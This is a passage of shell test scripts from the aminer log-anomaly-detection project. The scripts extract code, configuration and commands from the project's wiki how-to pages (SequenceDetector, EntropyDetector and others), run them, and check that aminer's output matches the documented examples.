sed -i "23 i \ self.counts_prev = {}" $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 17 $OUT) awk '/^```$/ && ++n == 21, /^```$/ && n++ == 22' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` compareStrings "$OUT1" "$IN1" "Failed Test in 15." exit_code=$((exit_code | $?)) # 16.) Remove the previously added lines and add the lines between 7th ```python and 23rd ```. tail -n 6 $TMP_FREQ_DET > $OUT IN=`cat $OUT` tac $TMP_FREQ_DET | sed '1,26d' | tac > $OUT cp $OUT $TMP_FREQ_DET awk '/^```python$/ && ++n == 7, /^```$/' < $INPUT | sed '/^```/ d' | sed '1,2d;38d' > $OUT IN1=`cat $OUT` echo -e "$IN1" >> $TMP_FREQ_DET echo -e "$IN" >> $TMP_FREQ_DET tac $TMP_FREQ_DET | sed '1d' | tac > $OUT # remove print cp $OUT $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET # 17.) Run CMD and compare the output to the one between 1st ```json and 24th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) # delete detectionTimestamp from comparison tac $OUT | sed '32d' | tac > $TMP_SCHEMA cp $TMP_SCHEMA $OUT OUT1=$(tail -n 59 $OUT) awk '/^```json$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' > $OUT # delete detectionTimestamp from comparison sed -i -e "29d" $OUT IN1=`cat $OUT` compareStrings "$OUT1" "$IN1" "Failed Test in 17." exit_code=$((exit_code | $?)) # 18.) Replace the do_persist method with the lines between 8th ```python and 25th ``` and run CMD. sed -i -e "56,59d" $TMP_FREQ_DET awk '/^```python$/ && ++n == 8, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n $IN1" >> $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) # 19.) Run CMD in 2nd ```bash and 26th ``` and compare it to the output in the second line. 
awk '/^```bash$/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD1=$(sed -n '1p' < $OUT) CMD1="${CMD1#* }" $CMD1 > $OUT OUT1=`cat $OUT` awk '/^```bash$/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=$(sed -n '2p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 19." exit_code=$((exit_code | $?)) # 20.) Add lines between 9th ```python and 27th ```. CMD="sudo aminer -f" awk '/^```python$/ && ++n == 9, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` sed -i "/ PersistenceUtil.add_persistable_component(self)/r $OUT" $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) sudo cp $TMP_VAL_SCHEMA $VAL_SCHEMA sudo cp $TMP_YML_CONFIG $YML_CONFIG sudo rm $TMP_VAL_SCHEMA sudo rm $CFG_PATH sudo rm $TMP_YML_CONFIG sudo rm $TMP_FREQ_DET sudo rm $FREQ_DET sudo rm $OUT sudo rm $TMP_SCHEMA sudo rm -r logdata-anomaly-miner.wiki exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runHowToCreateYourOwnSequenceDetector.sh000077500000000000000000000402131437606560100310030ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Read the log lines between the 2nd and 3rd ``` and save it to /tmp/access.log (LOG) # 2.) Read 2nd ```bash and 3rd ```, extract CMD from the first line after # , run CMD and compare the output with the 2nd to 4th line of the previous output. # 3.) Read commands between 3rd ```bash and 5th ```, get the CMD after # and check if aminer_install.sh exists and is executable. # 4.) Read the CMD between 4th ```bash and 6th ``` and get the CMD after # . # 5.) Replace the path in the second string with the current directory and run the CMD. # 6.) 
Read the CMD between 5th ```bash and 7th ```, get the CMD after # and run it. # 7.) Read the CMD between 6th ```bash and 8th ```, get the CMD after # and run it. # 8.) Read between 1st ```yaml and 9th ``` and store it in CFG_PATH. # 9.) Read CFG_PATH, replace the line with json: True and compare it with the 1st ```yaml in Getting-started-(tutorial).md. # 10.) Read 7th ```bash and 10th ```. Extract CMD in first line and run it as sudo. # 11.) Compare the outputs (replace lines with timestamps and dates). # 12.) Read 1st ```python and 12th ``` and write it to SEQ_DET. # 13.) Read 2nd ```yaml and 13th ``` and write it at 18th line in CFG_PATH. # 14.) Check if line between 15th and 16th ``` can be found in /usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/AnalysisNormalisationSchema.py # 15.) Add code between 18th and 19th ``` to /usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py # 16.) Add 2nd ```python and 21st ``` to the YML_CONFIG. # 17.) Run aminer CMD and check if the output contains "Detector template received a log atom!" times the number of log lines. # 18.) Read 3rd ```python and 24th ``` and replace the receive_atom method in the SEQ_DET. # 19.) Run aminer CMD and check if the output contains data between 25th and 26th ```. # 20.) Read 4th ```python and 27th ``` and replace the receive_atom method in the SEQ_DET. # 21.) Run aminer CMD and check if the output is the same as between 28th and 29th ```. # 22.) Read 5th ```python and 30th ``` and replace the receive_atom method in the SEQ_DET. # 23.) Replace Analysis in CFG_PATH with the config between 3rd ```yaml and 31st ```. # 24.) Run aminer CMD and check if the output is the same as between 32nd and 33th ```. # 25.) Add code between 34th and 35th ``` in the __init__ method. # 26.) Read 6th ```python and 36th ``` and replace the receive_atom method in the SEQ_DET. # 27.) Run aminer CMD and check if the output is the same as between 37th and 38th ```. # 28.) 
Read 7th ```python and 39th ``` and replace the receive_atom method in the SEQ_DET. # 29.) Add lines between 14th ```bash and 42nd ``` to the LOG. # 30.) Run aminer CMD and check if the output is the same as between 40th and 41st ``` plus the text between 43th and 44th ```. # 31.) Read 8th ```python and 45th ``` and replace the receive_atom method in the SEQ_DET. # 32.) Compare the output with the json between 1st ```json and 46th ```. # 33.) Replace the do_persist method with the code between 9th ```python and 47th ```. # 34.) Run the CMD in the first line between 15th ```bash and 48th ``` and compare the output with the second line. ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi sudo chown -R aminer:aminer /var/lib/aminer 2> /dev/null INPUT=logdata-anomaly-miner.wiki/HowTo-Create-your-own-SequenceDetector.md SRC_FILE=logdata-anomaly-miner.wiki/HowTo-Create-your-own-SequenceDetector.md VAL_SCHEMA=/usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py TMP_VAL_SCHEMA=/tmp/AnalysisValidationSchema.py NOR_SCHEMA=/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/AnalysisNormalisationSchema.py OUT=/tmp/out.txt YML_CONFIG=/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py TMP_YML_CONFIG=/tmp/YamlConfig.py TMP_SCHEMA=/tmp/schema.py SEQ_DET=/usr/lib/logdata-anomaly-miner/aminer/analysis/SequenceDetector.py TMP_SEQ_DET=/tmp/SequenceDetector.py CFG_PATH=/etc/aminer/config.yml LOG=/tmp/access.log # extract the file from the development branch of the wiki project. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. # create log file (1.) awk '/^```$/ && ++n == 2, /^```$/ && n++ == 3' < $INPUT | sed '/^```/ d' > $LOG # extract version command and compare output. (2.) 
#awk '/^```bash$/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' > $OUT #CMD=$(sed -n '1p' < $OUT) #CMD="sudo ${CMD#* }" #OUT1=$(sed -n '2,4p' < $OUT) #$CMD > $OUT & #PID=$! #sleep 5 #sudo pkill -x aminer #wait $PID #OUT2=`cat $OUT` #compareStrings "$OUT1" "$OUT2" "Failed Test in 2." #exit_code=$? # 3.) Read commands between 3rd ```bash and 5th ```, get the CMD after # and check if aminer_install.sh exists and is executable. FILE="aminer_install.sh" awk '/^```bash$/ && ++n == 3, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD=$(sed -n '1p' < $OUT) CMD="${CMD#* } -q" $CMD if [ ! -f "$FILE" ]; then echo "$FILE does not exist." exit_code=1 fi CMD=$(sed -n '2p' < $OUT) CMD="${CMD#* }" $CMD if [ ! -x "$FILE" ]; then echo "$FILE is not executable." exit_code=1 fi # 4.) Read the CMD between 4th ```bash and 6th ``` and get the CMD after # . (skipping this step) #awk '/^```bash$/ && ++n == 4, /^```$/' < $INPUT | sed '/^```/ d' > $OUT #CMD=$(sed -n '1p' < $OUT) #CMD="${CMD#* }" # 5.) Replace the path in the second string with the current directory and run the CMD. (skipping this step) #PWD=$(pwd) #CMD=$(echo "${CMD?/home/ubuntu/aminer?"$PWD"}" ) #$CMD # 6.) Read the CMD between 5th ```bash and 7th ```, get the CMD after # and run it. (skipping this step) #awk '/^```bash$/ && ++n == 5, /^```$/' < $INPUT | sed '/^```/ d' > $OUT #CMD=$(sed -n '1p' < $OUT) #CMD="${CMD#* }" #$CMD # 7.) Read the CMD between 6th ```bash and 8th ```, get the CMD after # and run it. awk '/^```bash$/ && ++n == 6, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD=$(sed -n '1p' < $OUT) CMD="${CMD#* }" $CMD 2> /dev/null # 8.) Read between 1st ```yaml and 9th ``` and store it in CFG_PATH. awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # 9.) Read CFG_PATH, replace the line with json: True and compare it with the 1st ```yaml in Getting-started-(tutorial).md. 
OUT1=$(sudo cat $CFG_PATH | sed -n '1,21p') CMD=$(sudo cat $CFG_PATH | sed -n '23p') OUT1="$OUT1 $CMD" awk '/^```yaml$/ && ++n == 1, /^```$/' < logdata-anomaly-miner.wiki/Getting-started-\(tutorial\).md | sed '/^```/ d' > $OUT sudo sed -i 's?file:///var/log/apache2/access.log?file:///home/ubuntu/access.log?g' $OUT OUT2=`cat $OUT` compareStrings "$OUT1" "$OUT2" "Failed Test in 9." exit_code=$((exit_code | $?)) sudo sed -i 's?file:///home/ubuntu/access.log?file:///tmp/access.log?g' $CFG_PATH # 10.) Read 7th ```bash and 10th ```. Extract CMD in first line and run it as sudo. awk '/^```bash$/ && ++n == 7, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD=$(sed -n '1p' < $OUT) CMD="sudo ${CMD#* }" runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) # 11.) Compare the outputs (replace lines with timestamps and dates). OUT1=$(sed -n '2,44p' < $OUT) OUT2=$(sed -n '46,98p' < $OUT) OUT1="$OUT1 $OUT2" OUT2=$(sed -n '100,131p' < $OUT) OUT1="$OUT1 $OUT2" OUT2=$(sed -n '2,44p' < $OUT) OUT3=$(sed -n '46,98p' < $OUT) OUT2="$OUT2 $OUT3" OUT3=$(sed -n '100,131p' < $OUT) OUT2="$OUT2 $OUT3" compareStrings "$OUT1" "$OUT2" "Failed Test in 11." exit_code=$((exit_code | $?)) # 12.) Read 1st ```python and 12th ``` and write it to SEQ_DET. awk '/^```python$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' > $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 13.) Read 2nd ```yaml and 13th ``` and write it at 18th line in CFG_PATH. awk '/^```yaml/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=$(tail -n 4 < $OUT) OUT1=$(head -n 17 < $CFG_PATH) OUT2=$(tail -n 5 < $CFG_PATH) echo "$OUT1 $IN1 $OUT2" | sudo tee $CFG_PATH > /dev/null # 14.) Check if line between 15th and 16th ``` can be found in /usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/AnalysisNormalisationSchema.py awk '/^```$/ && ++n == 15, /^```$/ && n++ == 16' < $INPUT > $OUT LINE=$(sed -n '2p' < $OUT) if ! 
fgrep -q "$LINE" $NOR_SCHEMA; then echo "$LINE not found in $NOR_SCHEMA" echo "Failed Test in 14." echo exit_code=1 fi # 15.) Add code between 18th and 19th ``` to /usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py sudo cp $VAL_SCHEMA $TMP_VAL_SCHEMA awk '/^{$/,/^ }$/' $VAL_SCHEMA > $TMP_SCHEMA echo , >> $TMP_SCHEMA awk '/^```$/ && ++n == 18, /^```$/ && n++ == 19' < $INPUT | sed '/^```/ d' >> $TMP_SCHEMA awk '/^ ]$/,/^}$/' $VAL_SCHEMA >> $TMP_SCHEMA sudo cp $TMP_SCHEMA $VAL_SCHEMA # 16.) Add 2nd ```python and 21st ``` to the YML_CONFIG. # create backup of YamlConfig.py cp $YML_CONFIG $TMP_YML_CONFIG # add code to YamlConfig.py printf " " > $TMP_SCHEMA awk '/^```python$/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' >> $TMP_SCHEMA sudo sed -i " /anomaly_threshold=item/r $TMP_SCHEMA" $YML_CONFIG # 17.) Run aminer CMD and check if the output contains "Detector template received a log atom!" times the number of log lines. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) CNT=$(grep -o "Detector template received a log atom!" $OUT | wc -l) if [ $CNT != 8 ]; then echo "Failed Test in 17. $CNT != 8" echo exit_code=1 fi # 18.) Read 3rd ```python and 24th ``` and replace the receive_atom method in the SEQ_DET. sed -i -e "34,36d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 3, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 19.) Run aminer CMD and check if the output contains data between 25th and 26th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 27 < $OUT) awk '/^```$/ && ++n == 25, /^```$/ && n++ == 26' < $INPUT | sed '/^```/ d' > $OUT OUT2=`cat $OUT` compareStrings "$OUT1" "$OUT2" "Failed Test in 19." exit_code=$((exit_code | $?)) # 20.) 
Read 4th ```python and 27th ``` and replace the receive_atom method in the SEQ_DET. sed -i -e "61,65d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 4, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 21.) Run aminer CMD and check if the output is the same as between 28th and 29th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 8 < $OUT) awk '/^```$/ && ++n == 28, /^```$/ && n++ == 29' < $INPUT | sed '/^```/ d' > $OUT OUT2=`cat $OUT` compareStrings "$OUT1" "$OUT2" "Failed Test in 21." exit_code=$((exit_code | $?)) # 22.) Read 5th ```python and 30th ``` and replace the receive_atom method in the SEQ_DET. sed -i -e "61,65d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 5, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 23.) Replace Analysis in CFG_PATH with the config between 3rd ```yaml and 31st ```. OUT1=$(head -n 18 $CFG_PATH) awk '/^```yaml/ && ++n == 3, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=$(tail -n 4 $OUT) OUT2=$(tail -n 5 $CFG_PATH) echo "$OUT1 $IN1 $OUT2" | sudo tee $CFG_PATH > /dev/null # 24.) Run aminer CMD and check if the output is the same as between 32nd and 33th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 8 < $OUT) awk '/^```$/ && ++n == 32, /^```$/ && n++ == 33' < $INPUT | sed '/^```/ d' > $OUT OUT2=`cat $OUT` compareStrings "$OUT1" "$OUT2" "Failed Test in 24." exit_code=$((exit_code | $?)) # 25.) Add code between 34th and 35th ``` in the __init__ method. awk '/^```$/ && ++n == 34, /^```$/ && n++ == 35' < $INPUT | sed '/^```/ d' > $OUT IN1=$(head -n 1 $OUT) sed -i "30 i \ $IN1" $TMP_SEQ_DET IN1=$(tail -n 1 $OUT) sed -i "31 i \ $IN1" $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 26.) 
Read 6th ```python and 36th ``` and replace the receive_atom method in the SEQ_DET. sed -i -e "82d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 6, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=$(tail -n 7 $OUT) echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 27.) Run aminer CMD and check if the output is the same as between 37th and 38th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 6 < $OUT) awk '/^```$/ && ++n == 37, /^```$/ && n++ == 38' < $INPUT | sed '/^```/ d' > $OUT OUT2=`cat $OUT` compareStrings "$OUT1" "$OUT2" "Failed Test in 27." exit_code=$((exit_code | $?)) # 28.) Read 7th ```python and 39th ``` and replace the receive_atom method in the SEQ_DET. awk '/^```python$/ && ++n == 7, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=$(tail -n 4 $OUT) echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 29.) Add lines between 14th ```bash and 42nd ``` to the LOG. echo "192.168.10.190 - - [29/Feb/2020:14:10:35 +0000] \"GET /services/portal/ HTTP/1.1\" 200 4345 \"-\" \"-\"" >> $LOG echo "192.168.10.190 - - [29/Feb/2020:14:10:45 +0000] \"GET /kronolith/ HTTP/1.1\" 200 3452 \"-\" \"-\"" >> $LOG echo "192.168.10.190 - - [29/Feb/2020:14:10:54 +0000] \"GET /nag/ HTTP/1.1\" 200 25623 \"-\" \"-\"" >> $LOG # 30.) Run aminer CMD and check if the output is the same as between 40th and 41st ``` plus the text between 43th and 44th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 15 < $OUT) awk '/^```$/ && ++n == 40, /^```$/ && n++ == 41' < $INPUT | sed '/^```/ d' > $OUT OUT2=`cat $OUT` awk '/^```$/ && ++n == 43, /^```$/ && n++ == 44' < $INPUT | sed '/^```/ d' > $OUT OUT3=`cat $OUT` OUT2="$OUT2 $OUT3" compareStrings "$OUT1" "$OUT2" "Failed Test in 30." exit_code=$((exit_code | $?)) # 31.) 
Read 8th ```python and 45th ``` and replace the receive_atom method in the SEQ_DET. sed -i -e "89,94d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 8, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 32.) Compare the output with the json between 1st ```json and 46th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 40 $OUT) echo "$OUT1" > $OUT OUT1=$(tail -n 3 $OUT) OUT2=$(head -n 36 $OUT) OUT1="$OUT2 $OUT1" awk '/^```json/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' > $OUT OUT2=$(tail -n 40 $OUT) echo "$OUT2" > $OUT OUT2=$(tail -n 3 $OUT) OUT3=$(head -n 36 $OUT) OUT2="$OUT3 $OUT2" compareStrings "$OUT1" "$OUT2" "Failed Test in 32." exit_code=$((exit_code | $?)) # 33.) Replace the do_persist method with the code between 9th ```python and 47th ```. sed -i -e "55,57d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 9, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) # 34.) Run the CMD in the first line between 15th ```bash and 48th ``` and compare the output with the second line. awk '/^```bash$/ && ++n == 15, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD=$(sed -n '1p' < $OUT) CMD="sudo ${CMD#* }" OUT1=$(sed -n '2p' < $OUT) $CMD > $OUT IN1=`cat $OUT` # not working, because sets have no real order. #compareStrings "$OUT1" "$IN1" "Failed Test in 34." #exit_code=$((exit_code | $?)) # reset schema to backup. 
sudo cp $TMP_VAL_SCHEMA $VAL_SCHEMA sudo cp $TMP_YML_CONFIG $YML_CONFIG sudo rm $TMP_VAL_SCHEMA sudo rm $CFG_PATH sudo rm $TMP_YML_CONFIG sudo rm $TMP_SEQ_DET sudo rm $SEQ_DET sudo rm $OUT sudo rm $TMP_SCHEMA sudo rm -r logdata-anomaly-miner.wiki sudo rm aminer_install.sh exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runHowToEntropyDetector.sh000077500000000000000000000127721437606560100262150ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Extract the lines between 1st ```yaml and 3rd ``` and store it in CFG_PATH. # 2.) Replace LogResourceList path with LOG1 in CFG_PATH and the report interval of the ParserCount. # 3.) Parse the aminer CMD between 4th and 5th ```, replace the CFG_PATH and run it. # 4.) Compare the first two anomalies with the output between 6th and 7th ``` (without the timestamps) # 5.) Compare the last anomaly with the output between 8th and 9th ``` (without the timestamps) # 6.) Parse the cat CMD in the first line between 10th and 11th ```, run it and compare the result with the second line. # 7.) Extract the lines between 2nd ```yaml and 12th ``` and store it in CFG_PATH. # 8.) Replace LogResourceList path with LOG2 in CFG_PATH. # 9.) Parse the aminer CMD between 13th and 14th ```, replace the CFG_PATH and run it. # 10.) Compare the results of the command with the outputs between 13th and 14th ```. ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi INPUT_FILE=logdata-anomaly-miner.wiki/HowTo-EntropyDetector.md OUT=/tmp/out.txt LOG1=/tmp/entropy_train.log LOG2=/tmp/entropy_test.log CFG_PATH=/tmp/config.yml TMPFILE1=/tmp/tmpfile1 TMPFILE2=/tmp/tmpfile2 # extract the file from the development branch of the wiki project. 
# the second ```python script is searched for. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cp files/entropy_train.log $LOG1 cp files/entropy_test.log $LOG2 cd .. # extract config (1.) awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # replace LogResourceList (2.) sed "s?file:///home/ubuntu/entropy/entropy_train.log?file:///${LOG1}?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null sed "s?report_interval: 5?report_interval: 555555555?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null # parse aminer CMD and run it (3.) awk '/^```$/ && ++n == 4, /^```$/ && n++ == 5' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD=$(cat $OUT) IFS='#' read -ra ADDR <<< "$CMD" CMD="sudo${ADDR[1]}" CMD=$(sed "s?config.yml?$CFG_PATH?g" <<<"$CMD") runAminerUntilEnd "$CMD" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" OUTPUT=$(cat $OUT) # compare results (4.) IN=$(awk '/^```$/ && ++n == 6, /^```$/ && n++ == 7' < $INPUT_FILE | sed '/^```/ d') i=0 while IFS= read -r line do if [[ $i -ne 22 && $i -ne 24 && $i -ne 50 && $i -ne 52 ]]; then echo "$line" >> $TMPFILE1 fi i=$(($i+1)) done <<< "$IN" i=0 while IFS= read -r line do if [[ $i -ge 76 && $i -ne 98 && $i -ne 100 && $i -ne 126 && $i -ne 128 ]]; then echo "$line" >> $TMPFILE2 fi if [[ $i -eq 131 ]]; then break fi i=$(($i+1)) done <<< "$OUTPUT" cmp --silent $TMPFILE1 $TMPFILE2 res=$? if [[ $res != 0 ]]; then echo "Failed Test in 4." fi exit_code=$((exit_code | res)) rm $TMPFILE1 rm $TMPFILE2 # compare last result (5.) 
IN=$(awk '/^```$/ && ++n == 8, /^```$/ && n++ == 9' < $INPUT_FILE | sed '/^```/ d') i=0 while IFS= read -r line do if [[ $i -ne 22 && $i -ne 24 ]]; then echo "$line" >> $TMPFILE1 fi i=$(($i+1)) done <<< "$IN" i=0 while IFS= read -r line do if [[ $i -ge 2082 && $i -ne 2104 && $i -ne 2106 ]]; then echo "$line" >> $TMPFILE2 fi if [[ $i -eq 2109 ]]; then break fi i=$(($i+1)) done <<< "$OUTPUT" cmp --silent $TMPFILE1 $TMPFILE2 res=$? if [[ $res != 0 ]]; then echo "Failed Test in 5." cat "$TMPFILE1" echo echo cat "$TMPFILE2" exit_code=1 fi exit_code=$((exit_code | res)) rm $TMPFILE1 rm $TMPFILE2 # parse cat CMD, run it and compare to the second line (6.) awk '/^```$/ && ++n == 10, /^```$/ && n++ == 11' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD=$(cat $OUT) IFS='#' read -ra ADDR <<< "$CMD" CMD="${ADDR[1]}" OUTPUT="$(eval sudo $CMD)" IN="$(tail -n 1 $OUT)" compareStrings "$OUTPUT" "$IN" "Failed Test in 6." exit_code=$((exit_code | $?)) # extract second config (7.) awk '/^```yaml$/ && ++n == 2, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # replace LogResourceList (8.) sed "s?file:///home/ubuntu/demo-detectors/entropy/entropy_test.log?file:///${LOG2}?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null # parse aminer CMD and run it (9.) awk '/^```$/ && ++n == 13, /^```$/ && n++ == 14' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD=$(cat $OUT) IFS='#' read -ra ADDR <<< "$CMD" CMD="sudo${ADDR[1]}" CMD=$(sed "s?config_test.yml?$CFG_PATH?g" <<<"$CMD") runAminerUntilEnd "$CMD" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" OUTPUT=$(head -n 28 $OUT) # skipping ParserCount output from runAminerUntilEndTest. # compare results (10.) 
awk '/^```$/ && ++n == 13, /^```$/ && n++ == 14' < $INPUT_FILE | sed '/^```/ d' > $OUT IN="$(tail -n +2 $OUT)" i=0 while IFS= read -r line do if [[ $i -ne 22 && $i -ne 24 ]]; then echo "$line" >> $TMPFILE1 fi i=$(($i+1)) done <<< "$IN" i=0 while IFS= read -r line do if [[ $i -ne 22 && $i -ne 24 ]]; then echo "$line" >> $TMPFILE2 fi i=$(($i+1)) done <<< "$OUTPUT" cmp --silent $TMPFILE1 $TMPFILE2 res=$? if [[ $res != 0 ]]; then echo "Failed Test in 10." cat $TMPFILE1 echo cat $TMPFILE2 fi exit_code=$((exit_code | res)) rm $OUT rm $LOG1 rm $LOG2 rm $TMPFILE1 rm $TMPFILE2 sudo rm -r logdata-anomaly-miner.wiki exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runHowToMissingMatchPathValueDetector.sh000077500000000000000000000211541437606560100307470ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # NOTE: not all outputs were compared! If one output fails all other outputs should be corrected as well! # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Write the config to CFG_PATH from 1st ```yaml to 1st ```. # 2.) Replace LogResourceList path with LOG in CFG_PATH. Lower the check_interval and realert_interval to proper values. # 3.) Write log lines from 4th to 5th ``` into LOG and LOG_ALICE and LOG_BOB. # 4.) Extract the first aminer command between 6th and 7th ```, replace the CFG_PATH and run it. # 5.) Compare the result with the output between 6th and 7th ```. # 6.) Extract the CMD between 8th and 9th ```, run it and compare the results to the output. # 7.) Extract the CMD between 10th and 11th ```, run it and compare the results to the output. # 8.) Set LearnMode: False in CFG_PATH # 9.) Extract the second aminer command between 16th and 17th ``` and run it in background. # 10.) Write LOG_ALICE and LOG_BOB to LOG simultaneously, wait for WAIT_TIME. Repeat 5 times. # 11.) 
